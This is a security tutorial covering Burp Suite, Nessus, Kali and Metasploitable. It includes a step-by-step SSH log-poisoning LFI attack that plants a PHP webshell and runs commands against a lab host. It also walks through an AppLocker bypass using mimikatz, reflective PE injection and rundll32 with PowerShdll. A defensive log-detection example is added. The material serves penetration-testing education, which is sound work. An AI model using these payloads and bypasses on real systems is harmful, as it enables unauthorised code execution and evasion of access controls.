BurpSuite

What is BurpSuite?


When it comes to securing web applications, Burp Suite stands out. It is produced by PortSwigger Security and written in Java. There are two editions of this security tool:

  1. A free edition, available for anyone to download, called the Free Edition.
  2. A paid edition, the Professional Edition, which is usually purchased after a free trial period.

Burp Suite was designed as a complete toolkit covering the whole process of testing a web application and addressing what is found. One notable point is that a mobile application offering the same tools as the desktop version was developed for newer iOS versions.

What are the tools that BurpSuite offers?


Let's look at the tools Burp Suite provides. There are several, and together they support the penetration testing needed to establish the security of a web application.

  1. HTTP proxy: Burp Suite includes a web proxy server that sits as a man-in-the-middle between the client (the tester's browser) and the web server at the other end of the connection. All raw traffic passing between the two ends can then be inspected and modified.
  2. Scanner: Burp Suite also offers a scanner that checks a web application for vulnerabilities and can run such scans automatically. This is an important part of web application penetration testing.
  3. Intruder: this tool can launch customised attacks against a vulnerable web application. It supports several kinds of attack, including SQL injection, cross-site scripting, parameter manipulation and brute-force attacks against susceptible inputs. It searches for attackable weaknesses and, once one is found, the attack can be launched; the user configures how the HTTP requests are generated.
  4. Spider: when manual mapping is the approach, this tool makes it quick and easy to map an application's content and functionality. In other words, it crawls the web application.
  5. Repeater: lets a user test an application by sending a modified request to the server, then sending a further request, and observing the results to understand the application's behaviour.
  6. Decoder: useful for encoded data. It recognises different encoding formats, using several techniques, and transforms encoded data back into its canonical form. It also works the other way round, transforming raw data into hashed and encoded forms.
  7. Comparer: compares two pieces of data and highlights the differences between them.
  8. Extender: allows third-party code, written by security testers, to use Burp Suite. In this way Burp Suite extensions can be loaded to add security functionality.
  9. Sequencer: analyses and measures the quality of randomness in a sample of data items. It shows whether session tokens or other data meant to be unpredictable can in fact be predicted. Examples of such tokens are anti-CSRF tokens, password reset tokens and others; they are meant never to be guessable.

Let’s now get started with Burp Suite

  • How to launch BurpSuite?

  1. The software is written in Java and ships as a .jar file, a standalone Java archive.
  2. Go to PortSwigger.net and download the Free Edition from there.
  3. If you are a professional user, log in with your credentials and download the Professional Edition instead.
  4. The jar file needs a Java runtime environment to run; there is no need to unpack its contents.
  5. Make sure Java is installed before starting Burp Suite.
  6. Open a command prompt; how to do this depends on your operating system:


  • On Windows, press the Start button, type "cmd" into the search box, then click the program to open it.
  • On Mac OS X, open "Applications" from the system dock, click "Utilities" and choose the Terminal app.
  • On Linux, choose "Console" or "Shell" from the list of applications.
  7. In the command prompt you just opened, type the following command: java -version
  8. If Java is installed, a message such as the following appears: java version "1.6.0_21". Note that Java 1.6 or later is required.
  9. Burp's .jar file can now be double-clicked to open Burp directly. However, launching Burp from the command line gives you more control and several options at execution time, for example specifying how much memory to dedicate to running Burp Suite.
  10. Try the following command, for instance:
java -jar -Xmx1024m /path/to/burp.jar

This command allocates 1024 MB of memory to Burp, with the Burp jar file located at /path/to/burp.jar.

  11. A splash screen should now appear, indicating that Burp is running correctly.

Let’s get to select a project

There are three options when opening or creating a project:

  1. Temporary project: best when the data does not need to be saved for later use. All data is held only in volatile memory.
  2. New project on disk: this option requires a Burp project file. A new project is created and must be given a name.
  3. Open existing project: simply opens an existing project. Note that the Spider and Scanner tools are paused by default at that point.


How to perform SSH Log Poisoning through LFI to exploit a web server?

This section describes a method for exploiting a web server that suffers from local file inclusion (LFI). Assume the target is a Metasploitable 2 machine and the attacking system runs Kali Linux.


The following steps walk through the process on Kali Linux:

  1. Open the Kali Linux terminal.
  2. Connect to the target using the SSH service; the following command serves (msfadmin being the Metasploitable user examined below):
    ssh msfadmin@192.168.1.105
  3. Check the permissions of the auth.log file first, using the following command:
    ls -l /var/log/auth.log
  4. Usually auth.log is world-readable (read-write for its owner), and the listing looks like this:
    -rw-r--r-- 1 syslog adm ...
  5. We can therefore read the file and all of its log entries with the following command:
    tail -f /var/log/auth.log
  6. Walk through the logs and check the entries for the user named "msfadmin".
  7. Now attempt to connect to the server with a counterfeit username. The following command makes an invalid login attempt:
    ssh hacker@192.168.1.105
  8. Permission is denied, as shown by the message:
    "Permission denied, please try again."


  9. Go back to the auth.log file and check whether the fake login attempt was recorded. It should show that the invalid user tried to gain access; if the attempt came from 192.168.1.104, the following line appears:
    "Failed Password for invalid user hacker from 192.168.1.104 port 56566 ssh2"
  10. This means that every login, successful or not, is recorded in the log. Next, pass PHP code as the invalid username and observe the result. The following command makes a login attempt whose username is PHP code:
    ssh '<?php system($_GET["c"]); ?>'@192.168.1.105
  11. Return to the auth.log file once more and check that this attempt was recorded too. If it came from 192.168.1.104, the following line appears:
    "Failed Password for invalid user <?php system($_GET["c"]); ?> from 192.168.1.104 port 49642 ssh2"
  12. Assume an LFI page has already been created; browse to it with the following link:
    192.168.1.105/lfi/lfi.php
  13. An error appears that indicates a local file inclusion vulnerability.
  14. Now include the auth.log file through the page's parameter, using the following URL in the browser:
    192.168.1.105/lfi/lfi.php?file=/var/log/auth.log
  15. A warning is displayed with the following text:
    Warning cannot execute a blank command
  16. What this means: the PHP code written into the log, which calls system() on the c parameter, is now executed by the include, and the c parameter was empty. Any command can now be passed through that parameter.
  17. Browse to
     "192.168.1.105/lfi/lfi.php?file=/var/log/auth.log&c=ps"
    This dumps the contents of auth.log and also executes the command given through the c parameter.
  18. Browse to
     "192.168.1.105/lfi/lfi.php?file=/var/log/auth.log&c=pwd"
    The command's output is displayed in the browser window.
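As an added example (not part of the original article), the following Python covers both sides of this section from the defender's side: a detector that flags sshd "invalid user" entries whose username carries PHP tags or shell metacharacters, run over constructed auth.log lines, and the allowlist plus base-directory check that an include handler such as lfi.php should apply to its file parameter instead of including it directly. The log format, file paths and allowlist are assumptions.

```python
"""Detect SSH log poisoning in auth.log and model a hardened include check."""
import os
import re

# sshd's failure line as quoted in the article; the username runs up to
# " from <ip> port <n>". Assumption: standard OpenSSH wording (case-insensitive).
_FAILED_RE = re.compile(
    r"Failed password for invalid user (?P<user>.*?) from "
    r"(?P<ip>\d{1,3}(?:\.\d{1,3}){3}) port (?P<port>\d+)",
    re.IGNORECASE,
)

# Characters a legitimate username never contains: PHP/ASP tags, shell
# metacharacters and whitespace inside the name.
_SUSPICIOUS_RE = re.compile(r"<\?|\?>|<%|[;|&`$()<>\s]")


def find_poisoned_entries(lines):
    """Return (user, ip, line_no) for failed logins whose username looks like injected code."""
    hits = []
    for n, line in enumerate(lines, 1):
        m = _FAILED_RE.search(line)
        if m and _SUSPICIOUS_RE.search(m.group("user")):
            hits.append((m.group("user"), m.group("ip"), n))
    return hits


def resolve_include(base_dir, requested, allowlist):
    """Return the absolute path to include, or None if the request must be refused.

    The request must name an allowlisted file, and the resolved path must stay
    inside base_dir, so neither /var/log/auth.log nor ../ traversal gets through.
    """
    if requested not in allowlist:
        return None
    base = os.path.realpath(base_dir)
    target = os.path.realpath(os.path.join(base, requested))
    if os.path.commonpath([base, target]) != base:
        return None
    return target


# Constructed sample lines; the two "invalid user" entries mirror the article's.
SAMPLE_AUTH_LOG = [
    "Accepted password for msfadmin from 192.168.1.104 port 56510 ssh2",
    "Failed password for invalid user hacker from 192.168.1.104 port 56566 ssh2",
    "Failed password for invalid user <?php system($_GET['c']); ?> from 192.168.1.104 port 49642 ssh2",
    "Failed password for invalid user alice.jones from 10.0.0.7 port 4022 ssh2",
]

if __name__ == "__main__":
    for user, ip, n in find_poisoned_entries(SAMPLE_AUTH_LOG):
        print(f"line {n}: suspicious username {user!r} from {ip}")
    # Hypothetical include directory and allowlist for the page's lfi.php.
    print(resolve_include("/var/www/lfi/pages", "about.html", {"about.html"}))
    print(resolve_include("/var/www/lfi/pages", "/var/log/auth.log", {"about.html"}))
```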

What is Kali Linux? 

Kali Linux is one of the most important security tools to understand and work with. Let's summarise its benefits.


⦁ Penetration testers and digital forensics practitioners consider it an essential tool.
⦁ It provides a wide variety of tools and functions, which fall into thirteen categories:
    ⦁ Information gathering, such as Dmitry
    ⦁ Vulnerability analysis, such as Inguma
    ⦁ Exploitation tools, such as the Metasploit Framework
    ⦁ Wireless attacks, such as WiFi Honey
    ⦁ Forensics, such as Binwalk
    ⦁ Web applications, such as Skipfish
    ⦁ Stress testing, such as FunkLoad
    ⦁ Sniffing and spoofing, such as Wireshark
    ⦁ Password attacks, such as TrueCrack
    ⦁ Maintaining access, such as Intersect
    ⦁ Hardware hacking, such as dex2jar
    ⦁ Reverse engineering, such as Apktool
    ⦁ Reporting tools, such as MagicTree

What is Metasploitable?


Metasploitable is a deliberately vulnerable machine intended for training, testing exploits and general target practice. A distinctive aspect of Metasploit is that it can check for vulnerabilities at the operating-system and network-service layers, not merely the application layer.

Metasploitable 2 is like a grab bag of security tools, Metasploit among them. An environment is commonly set up with Metasploitable 2 to help with examining and practising the exploitation of vulnerabilities.

Metasploitable 3 is the newer version. It is a virtual machine built from the ground up with a large number of security vulnerabilities, against which Metasploit is used to test exploits. Metasploitable 3 was originally released under a BSD-style license.

The requirements for running Metasploitable are:

  1. An operating system capable of running all of the required applications.
  2. A processor with VT-x/AMD-V support (recommended).
  3. 65 GB of available disk space.
  4. 4.5 GB of RAM.

We have mentioned that Metasploitable is built around Metasploit, so let's close with a few words about Metasploit.

The Metasploit Project is a computer security project that provides information about vulnerabilities and aids penetration testing. Penetration testing is an authorised simulated attack on a computer system that looks for security weaknesses; it also supports Intrusion Detection System (IDS) signature development, an IDS being a system that monitors a network or hosts for malicious activity. Its best-known sub-project is the open source Metasploit Framework, the most widely used exploit development framework in the world. I will elaborate on this framework later in this article.

Finally, Metasploit can be used both for legitimate and for unauthorised access and activity on computer systems. In this regard it is no different from commercial products such as Immunity's Canvas or Core Security Technologies' offering. Metasploit is commonly used to break into remote systems or to test a computer system for vulnerabilities.


Nessus

What is Nessus?

Nessus is a renowned product from Tenable Network Security that specialises in monitoring and scanning for security vulnerabilities. Its initial release was free to use for non-enterprise clients. According to sechtools.com, it ranked as the first and most popular vulnerability scanner among its counterparts in 2000, 2003 and 2006.

There are four main Nessus products. Nessus Cloud is a Software as a Service (SaaS) platform. Nessus Manager is a physical or virtual vulnerability manager. Nessus Professional is a version that runs on a device such as a laptop or personal computer (PC). Finally, Nessus Home is the free version for home users.

Historical Overview


In 1998, Renaud Deraison set out to create a free remote security scanner and publish it online for everyone to use. The project was open source until 2005, when it became closed source, owned by Tenable Network Security, which Deraison co-founded.

In 2005, Tenable Network Security estimated that more than seventy-five thousand organisations around the world used it. The current version at the time was Nessus 3; its engine remains free to use, but it costs $100/month per scanner. Nessus 3 supports Microsoft Windows, Unix, Linux and other operating systems.

Before Nessus 3 there was Nessus 2, which required an agent to run on the various operating systems and was notoriously slow. Nessus 2 was licensed under the General Public License (GPL), which paved the way for similar open source projects such as OpenVAS and Porz-Wahn. Even so, Tenable Network Security kept releasing updates for this version after Nessus 3 appeared.

In 2008 the situation improved somewhat, from both the company's and users' perspectives, when a free version for home users gained access to the plugin feeds. Enterprises, meanwhile, had to pay (and still have to) to use the software for commercial purposes.

In 2009, Tenable Network Security released Nessus 4, followed by Nessus 5 in 2012 and the newest version, Nessus 6, in 2014.

What does Nessus do?


Let's now look at its features and how useful such software can be for security purposes. First, here are some of the services Nessus 3 and its descendants provide.

  • It automatically scans for vulnerabilities and analyses them in order to prioritise the recommended remediation.
  • Plugins are fed to customers' installations daily so that newly disclosed vulnerabilities can be detected.
  • Supports Supervisory Control and Data Acquisition (SCADA) audits.
  • Supports audits of embedded devices.
  • Offers mobile device scanning.
  • Web applications and cloud environments can also be scanned.
  • It can search for sensitive data such as social security numbers, credit card details and other confidential information.
  • Nessus 3 offers technical support for an organisation.
  • It can audit anti-virus configurations.
  • It can audit against Federal Desktop Core Configuration (FDCC) standards.
  • Nessus 3 also supports Payment Card Industry Data Security Standard (PCI-DSS) audits.

Now let's break down the types of vulnerabilities Nessus can detect:

  1. Password-related vulnerabilities, such as
    • System accounts with no password
    • System accounts with default passwords, or with the passwords set at initial setup or after a reset
  2. Vulnerabilities whose remote exploitation could grant access to sensitive data
  3. Misconfigurations, such as missing software patches or an open mail relay
  4. Denial-of-service vulnerabilities in the TCP/IP stack, found by sending mangled packets over the network
  5. Preparation for PCI DSS audits

Is Nessus actually necessary?

The answer follows from a summary of its unique capabilities, which also explain why one would choose it.

  • Endpoint agents can be configured on a device:
    • They allow offline scans and report results to Nessus Cloud and Nessus Manager administrators once an internet connection is established.
    • They can also scan devices for malware.
  • When an organisation buys Nessus Professional, or hosts on Nessus Cloud or Nessus Manager, technical support is always available.
  • On-demand, completely free training is offered in person at Tenable Network Security's centres, virtually, or on-site at the customer's location.
  • The Nessus console has a polished, user-friendly graphical user interface (GUI):
    • Security policies can be applied with a few clicks and checkboxes.
    • Administrators can have email notifications sent with scan results and recommended remediation.
    • Administrators can run preconfigured or customised reports on a host.
  • It exposes a Representational State Transfer (RESTful) API for easy integration into any organisation.
  • Both Nessus Cloud and Nessus Manager integrate with CyberArk for credential management, and with various patch management systems, for example from:
    • For computer systems: Microsoft, Dell, IBM and Red Hat.
    • For mobile systems: Apple, Microsoft, AirWatch and MobileIron.

Given these points, and depending on the business's practices, my answer to the initial question is definitely yes. Taken together, these characteristics set it apart from other scanners: some offer one of them, but it is almost impossible so far to find a product that combines them all.

How to use Nessus for Penetration testing?

Nessus is not actually a penetration testing tool. However, its scan results, combined with penetration testing tools, can indicate the security risk of a computer system. Testing tools used in this way include Immunity CANVAS, Core IMPACT and, of course, Metasploit. In addition, for password-related vulnerabilities it can use the password cracking tool Hydra to obtain the password and gain access.

For instance, one could use the free Nessus Home edition to help with penetration testing, as follows.

  1. Download and install it.
  2. Set up a Nessus account and activate the installed copy with the activation code.
  3. Start a vulnerability scan.
  4. Understand the results: if you chose Basic Network Scan, go through each device's Internet Protocol (IP) address and work out where the vulnerabilities originate.
  5. Work out how to exploit those findings. Nessus does not specialise in this, but it shows you where to look.


How to Bypass a Windows AppLocker?

Quick Background on AppLocker

First, let's look at what AppLocker is and how it works before going into the technical details.

AppLocker is Microsoft software that grants some users specific privileges while denying them to others. In other words, some users may open particular applications on the operating system while others may not; for instance, one user can run Internet Explorer freely while another cannot even open it. Highly sensitive machines such as Automated Teller Machines (ATMs) and computers inside important organisations use AppLocker.

AppLocker covers five main categories of files:

  • Executable files with .exe and .com extensions, such as ipconfig.exe
  • Installer files, which Windows uses to install new software on the machine; these have .msi, .msp and .mst extensions
  • Script files with .ps1, .vbs, .vba, .cmd and .js extensions
  • Packaged apps installed through the Microsoft Store
  • DLL files with .dll and .ocx extensions

This article focuses on the file formats most commonly involved in AppLocker security restrictions and privileges, so it mainly deals with executable files, installers and script files.

How to activate AppLocker on your machine

  1. Open Administrative Tools -> Services
  2. Open the Group Policy Editor, which is gpmc.msc on a domain controller and gpedit.msc on a local machine
  3. If the previous steps did not work, type "Edit group policy" into the search box in the menu bar.
  4. Under "Security Settings", open "Application Control Policies".
  5. Press "Configure Rule Enforcement" to choose among the five application categories listed above and apply appropriate filtering to each.
  6. Three main criteria then determine the rules governing each of those categories:

a. Execution path:

By default, all executable files and scripts that reside in the two directories "C:\Windows" and "C:\Program Files" are allowed. If files in these locations were not allowed, the system would not boot in the first place.

b. Publisher information:

AppLocker can rely on the vendor's public key, with which a given executable or binary file is signed, and on that basis decide whether the file is allowed or denied.

c. File hash:

AppLocker stores Message Digest 5 (MD5) hashes of executable files and uses them to decide whether a given file is allowed. Although this requires a great deal of memory, it is essential for preventing hazardous executable files from running.

Consider a Standard Setup

If the user does not change any of the default rules, all executable files other than those in "C:\Windows" and "C:\Program Files" cannot be run anywhere on the machine. That is a problem for us because, for instance, we cannot run Meterpreter.exe.

There is, in fact, a way out. Think of it this way: executable files are not allowed to run from several locations on the machine, while other locations do not prevent the same files from running. If you could find those other locations, then even as a standard user without admin privileges you could run any executable you wanted; that seems straightforward, right? But going through each location manually to inspect the rules applied to it is tedious. What is the solution, then?

A PowerShell script is an appropriate way to automatically identify where we are allowed to write, and therefore to run our executable. A basic installation leaves "C:\Windows\Tasks" and "C:\Windows\tracing" writable by everyone.

  • To have PowerShell show us these locations, the "Get-Content" and "Invoke-Expression" commands are used.

  • Once we know these locations are writable, copy the desired executable there, whether "mimikatz.exe", "meterpreter.exe" or whatever you want to run on the machine.
  • Run the executable. An executable is convenient because it packages a particular piece of malware or a custom tool, but an attack does not actually require one; it can be done with Invoke-Expression alone, which bypasses any execution path restriction.

Now consider another case: you have searched for writable directories and found none. What then? If we could store the executable we want somewhere in memory and jump to its address without needing any directory, the problem would be solved.

  • Use a PowerShell variable to hold the executable file.
  • Use the PowerSploit framework's Invoke-ReflectivePEInjection function. It loads the file into a memory location, to which you then jump in order to run it.

Consider a more advanced Setup

What if the user is aware of the weaknesses of the default rules and has additionally restricted the use of cmd.exe and PowerShell.exe, so that none of the previous steps, which rely on those applications, can be used?

  • Look for something the user forgot to block.
  • In this case, the user took care of all the 64-bit Windows tools and applied the desired rules to them, but overlooked the 32-bit tools, which are the way to go instead. Simply use the "C:\Windows\SysWOW64\" location to open PowerShell, from where we can work with our executable as described before.
  • Even just searching for "PowerShell.exe" turns up several versions of PowerShell, each with its own unique hash. Plenty of PowerShell binaries remain whose hashes differ from the blocked one.
  • If all of the above instances of PowerShell are blocked along with cmd.exe, there is still a way out.
  • Use "C:\Windows\System32\wbem\wmic.exe". This utility gets us very close to the system information we want. It is not as easy as PowerShell, of course, but it still provides an alternative.

Consider an even more advanced Setup

The user may be capable enough to block all of the previous methods, so that even WMIC cannot run. There is always a way out!

  • Note which DLL files are not blocked.
  • Search online for a DLL implementation of PowerShell.
  • Download it into any folder.
  • Run it using the "C:\windows\system32\rundll32.exe" utility.
  • To execute it, type the DLL and its entry point function; in our case, type "rundll32.exe PowerShdll.dll,main".


Finally, check out my other article on Transferring files from Linux to Windows (after exploit).
